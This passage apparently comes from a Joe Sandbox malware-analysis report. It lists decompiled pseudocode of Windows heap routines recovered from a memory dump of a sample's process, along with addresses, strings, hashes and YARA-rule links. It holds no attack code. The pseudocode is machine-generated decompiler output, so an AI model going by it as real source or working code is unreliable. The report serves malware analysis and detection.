								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00ABB150();
									_t260 = _t257 + 4;
								} else {
									E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00ABB150();
								_t257 = _t260 + 4;
								__eflags =  *0xba7bc8;
								if(__eflags == 0) {
									E00B72073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00B7A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						L00B0D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = L00ADAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00B7A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00B7A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xba8748 - 1;
					if( *0xba8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00ABB150();
							} else {
								E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00ABB150();
							__eflags =  *0xba7bc8;
							if(__eflags == 0) {
								_t131 = E00B72073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                            0x00ada83a
                            0x00ada83c
                            0x00ada83e
                            0x00ada841
                            0x00ada844
                            0x00ada84a
                            0x00adaa53
                            0x00adaa59
                            0x00adaa59
                            0x00ada858
                            0x00ada85e
                            0x00adaaf5
                            0x00adaafc
                            0x00b2229e
                            0x00b222a2
                            0x00b222a8
                            0x00b222b3
                            0x00b222b5
                            0x00b222bb
                            0x00b222c1
                            0x00b222c5
                            0x00b222e6
                            0x00b222eb
                            0x00b222f0
                            0x00b222c7
                            0x00b222dc
                            0x00b222e1
                            0x00b222e1
                            0x00b222f3
                            0x00b222f8
                            0x00b222fd
                            0x00b22300
                            0x00b22307
                            0x00b2230e
                            0x00b2230e
                            0x00b22313
                            0x00b22313
                            0x00b222b5
                            0x00b222a2
                            0x00adaafc
                            0x00ada864
                            0x00ada869
                            0x00adaa5c
                            0x00adaa5e
                            0x00ada86f
                            0x00ada87f
                            0x00ada885
                            0x00ada885
                            0x00ada88b
                            0x00ada890
                            0x00ada896
                            0x00adab0c
                            0x00adab0f
                            0x00adab15
                            0x00b22320
                            0x00b22320
                            0x00adab1b
                            0x00ada89c
                            0x00ada89f
                            0x00ada8a2
                            0x00ada8a2
                            0x00ada8a5
                            0x00ada8af
                            0x00ada8b3
                            0x00ada8b8
                            0x00adaa66
                            0x00ada8be
                            0x00ada8c5
                            0x00ada8c6
                            0x00ada8ce
                            0x00b22328
                            0x00b22332
                            0x00b22337
                            0x00b22337
                            0x00ada8ce
                            0x00ada8d4
                            0x00ada8d8
                            0x00ada8db
                            0x00ada8de
                            0x00ada8e1
                            0x00ada8e5
                            0x00ada8e8
                            0x00ada8f0
                            0x00ada8f3
                            0x00b2234c
                            0x00b22350
                            0x00b22355
                            0x00b22359
                            0x00b22359
                            0x00ada8f9
                            0x00ada901
                            0x00adaae4
                            0x00adaae4
                            0x00adaaea
                            0x00000000
                            0x00ada907
                            0x00ada90a
                            0x00ada91d
                            0x00ada91d
                            0x00000000
                            0x00ada910
                            0x00ada910
                            0x00ada910
                            0x00ada914
                            0x00ada924
                            0x00ada924
                            0x00ada924
                            0x00ada924
                            0x00ada916
                            0x00ada91b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ada91b
                            0x00ada925
                            0x00ada925
                            0x00ada932
                            0x00ada936
                            0x00ada93c
                            0x00ada93c
                            0x00ada93c
                            0x00adab22
                            0x00adab24
                            0x00adab27
                            0x00adab27
                            0x00ada942
                            0x00ada944
                            0x00adaaba
                            0x00adaabd
                            0x00adaac0
                            0x00adaac0
                            0x00adaac2
                            0x00adab2f
                            0x00adaac4
                            0x00adaac4
                            0x00adaac7
                            0x00adaaca
                            0x00adaacc
                            0x00adaace
                            0x00adaace
                            0x00adaace
                            0x00adaad1
                            0x00adaad1
                            0x00adaad7
                            0x00adaad9
                            0x00000000
                            0x00000000
                            0x00b22361
                            0x00b22369
                            0x00b2236b
                            0x00000000
                            0x00b22371
                            0x00000000
                            0x00b22371
                            0x00000000
                            0x00b2236b
                            0x00adaac0
                            0x00ada94a
                            0x00ada94a
                            0x00ada94d
                            0x00ada94d
                            0x00ada950
                            0x00ada954
                            0x00b22376
                            0x00b22380
                            0x00ada95a
                            0x00ada95a
                            0x00ada95c
                            0x00ada95f
                            0x00ada961
                            0x00ada961
                            0x00ada967
                            0x00ada96a
                            0x00ada972
                            0x00adaa02
                            0x00adaa06
                            0x00adaa10
                            0x00adaa16
                            0x00adaa16
                            0x00adaa1b
                            0x00adaa21
                            0x00adaa24
                            0x00adaa27
                            0x00adaa29
                            0x00adaa2c
                            0x00adaa32
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ada978
                            0x00ada978
                            0x00ada97b
                            0x00ada981
                            0x00ada996
                            0x00ada998
                            0x00ada99f
                            0x00ada9a2
                            0x00b2238a
                            0x00ada9a8
                            0x00ada9a8
                            0x00ada9a8
                            0x00ada9aa
                            0x00ada9ad
                            0x00ada9b0
                            0x00ada9bb
                            0x00ada9be
                            0x00ada9c7
                            0x00ada9c9
                            0x00ada9c9
                            0x00ada9cc
                            0x00ada9d1
                            0x00adaa6d
                            0x00adaa70
                            0x00adaa73
                            0x00adaa75
                            0x00adaa79
                            0x00adaa7e
                            0x00adaa82
                            0x00adaa8f
                            0x00adaa94
                            0x00adaa96
                            0x00b22392
                            0x00b223a1
                            0x00b223a1
                            0x00adaa9c
                            0x00adaa9f
                            0x00adaaa2
                            0x00adaaa2
                            0x00adaaa8
                            0x00adaaab
                            0x00adaaaf
                            0x00000000
                            0x00adaab5
                            0x00000000
                            0x00adaab5
                            0x00ada9d7
                            0x00ada9d7
                            0x00ada9da
                            0x00ada9e0
                            0x00ada9e3
                            0x00ada9e6
                            0x00ada9e9
                            0x00ada9eb
                            0x00ada9fd
                            0x00ada9fd
                            0x00000000
                            0x00ada9eb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ada983
                            0x00ada983
                            0x00ada983
                            0x00ada987
                            0x00ada995
                            0x00ada995
                            0x00ada995
                            0x00ada995
                            0x00ada989
                            0x00ada98e
                            0x00000000
                            0x00ada990
                            0x00000000
                            0x00ada990
                            0x00ada98e
                            0x00000000
                            0x00ada983
                            0x00ada972
                            0x00ada90a
                            0x00adaa34
                            0x00adaa34
                            0x00adaa40
                            0x00adaa43
                            0x00adaa46
                            0x00adaa4d
                            0x00b223ab
                            0x00b223b2
                            0x00b223b8
                            0x00b223be
                            0x00b223c3
                            0x00b223c5
                            0x00b223cb
                            0x00b223d1
                            0x00b223d5
                            0x00b223f6
                            0x00b223fb
                            0x00b223d7
                            0x00b223ec
                            0x00b223f1
                            0x00b22403
                            0x00b22408
                            0x00b22410
                            0x00b22417
                            0x00b22422
                            0x00b22422
                            0x00b22417
                            0x00b223c5
                            0x00b223b2
                            0x00000000

                            Strings
                            • HEAP: , xrefs: 00B222E6, 00B223F6
                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00B22403
                            • HEAP[%wZ]: , xrefs: 00B222D7, 00B223E7
                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00B222F3
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                            • API String ID: 0-1657114761
                            • Opcode ID: 8cac9d01be2ec8917e8d121bab5698e54ce6eb949ecb7bd534682ee119aba85c
                            • Instruction ID: 2f9550b4a9806a3102fc0f5b02d5bfedd6b2032c6c4b349647a346e38607e545
                            • Opcode Fuzzy Hash: 8cac9d01be2ec8917e8d121bab5698e54ce6eb949ecb7bd534682ee119aba85c
                            • Instruction Fuzzy Hash: 7BD1CF70A006459FDB18CF68C590BBAB7F1FF68300F25856AE85B9B742E734AD41CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00ADA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				L00ADDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = L00AF9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00B7A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00AF9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00ABB150();
					} else {
						E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00ABB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = L00AD7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00B7138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(L00AD7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = L00AD7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						L00B71582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = L00AD7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = L00AD7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					L00B71582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					L00B0D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                            0x00ada229
                            0x00ada231
                            0x00ada23f
                            0x00ada242
                            0x00ada244
                            0x00ada24c
                            0x00ada255
                            0x00ada25a
                            0x00ada25f
                            0x00b21c76
                            0x00b21c78
                            0x00b21c7e
                            0x00b21c7f
                            0x00b21c81
                            0x00b21c82
                            0x00b21c84
                            0x00b21c89
                            0x00b21c8b
                            0x00b21c9e
                            0x00b21c9e
                            0x00b21cab
                            0x00b21cb2
                            0x00000000
                            0x00b21cb2
                            0x00b21c8d
                            0x00b21c92
                            0x00000000
                            0x00000000
                            0x00b21c94
                            0x00b21c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b21c98
                            0x00ada265
                            0x00ada265
                            0x00ada266
                            0x00ada26f
                            0x00ada270
                            0x00ada276
                            0x00ada277
                            0x00ada279
                            0x00ada27e
                            0x00ada282
                            0x00b21db5
                            0x00b21dbb
                            0x00b21dc1
                            0x00b21dc5
                            0x00b21de4
                            0x00b21de9
                            0x00b21dc7
                            0x00b21ddc
                            0x00b21de1
                            0x00b21def
                            0x00b21df3
                            0x00b21df7
                            0x00b21dfe
                            0x00b21e06
                            0x00ada302
                            0x00ada308
                            0x00ada308
                            0x00ada288
                            0x00ada28d
                            0x00ada294
                            0x00b21cc1
                            0x00ada29a
                            0x00ada29a
                            0x00ada29a
                            0x00ada29f
                            0x00b21ccb
                            0x00b21cd1
                            0x00b21cd8
                            0x00b21cea
                            0x00b21cea
                            0x00b21cd8
                            0x00ada2a9
                            0x00ada2af
                            0x00ada2bc
                            0x00b21cfd
                            0x00ada2c2
                            0x00ada2c2
                            0x00ada2c2
                            0x00ada2c7
                            0x00b21d07
                            0x00b21d0d
                            0x00b21d14
                            0x00b21d1f
                            0x00b21d21
                            0x00b21d2c
                            0x00b21d2c
                            0x00b21d2c
                            0x00b21d47
                            0x00b21d47
                            0x00b21d14
                            0x00ada2cd
                            0x00ada2d2
                            0x00ada2d9
                            0x00b21d5a
                            0x00ada2df
                            0x00ada2df
                            0x00ada2df
                            0x00ada2e4
                            0x00b21d69
                            0x00b21d6b
                            0x00b21d76
                            0x00b21d76
                            0x00b21d76
                            0x00b21d91
                            0x00b21d91
                            0x00ada2ea
                            0x00ada2f0
                            0x00ada2f5
                            0x00b21da8
                            0x00b21dad
                            0x00b21dad
                            0x00ada2fd
                            0x00ada300
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                            • API String ID: 2994545307-2586055223
                            • Opcode ID: 262d43943fc93a307a99d49c4b173aed94549813ed0ab769fe109e117af4022b
                            • Instruction ID: ab25edfb889cf7b5b02922a7a0ae9341722f78ade19e57f9d69166e45963ff6c
                            • Opcode Fuzzy Hash: 262d43943fc93a307a99d49c4b173aed94549813ed0ab769fe109e117af4022b
                            • Instruction Fuzzy Hash: 125135322046809FD721DB68D945F6777E8FF94B50F1808A5F49A8B392D734DD00CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B749A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                            • API String ID: 2994545307-336120773
                            • Opcode ID: 34f7697b796e4af97f8b8d6e6a11d6826e69557434a32b24500151ddb85eb737
                            • Instruction ID: 4a5bb1bae8cc41ac5d7b49d9d2322737fd4dd189704d42e854624915b251c6e6
                            • Opcode Fuzzy Hash: 34f7697b796e4af97f8b8d6e6a11d6826e69557434a32b24500151ddb85eb737
                            • Instruction Fuzzy Hash: 31310631290514FFDB11DB98C986F6773ECFF04762F248595F429DB292E770A840CA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00AD99BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00B6FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00B7A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = L00B0D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00ABB150();
										} else {
